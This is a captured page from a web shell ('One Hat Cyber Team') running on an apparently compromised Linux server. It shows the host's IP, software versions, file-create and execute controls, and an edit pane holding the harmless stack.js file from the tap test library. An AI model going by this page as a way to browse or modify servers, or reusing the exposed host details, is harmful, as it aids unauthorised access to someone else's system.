One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
4518
/
root
/
usr
/
share
/
nodejs
/
tap
/
lib
/
Edit File:
stack.js
'use strict' const sourceMapSupport = require('source-map-support') const StackUtils = require('stack-utils') const path = require('path') const tapDir = path.resolve(__dirname, '..') const os = require('os') const resc = str => str.replace(/[\-\[\]\/\{\}\(\)\*\+\?\.\\\^\$\|]/g, '\\$&') // Ignore tap if it's a dependency, or anything // in this lib folder. // don't skip when developing on tap itself const skip = (process.cwd() !== tapDir || +process.env.TAP_DEV_SHORTSTACK === 1) && +process.env.TAP_DEV_LONGSTACK !== 1 ? [ /node_modules[\/\\]tap[\/\\]/, new RegExp(resc(path.resolve(os.homedir(), '.node-spawn-wrap-')) + '.*'), new RegExp(resc(tapDir) + '\\b', 'i'), new RegExp(resc(require.resolve('function-loop'))), // new RegExp(resc(path.dirname(require.resolve('bluebird/package.json')))) ] : [] sourceMapSupport.install({environment:'node'}) module.exports = new StackUtils({ internals: StackUtils.nodeInternals().concat(skip), wrapCallSite: sourceMapSupport.wrapCallSite })
Simpan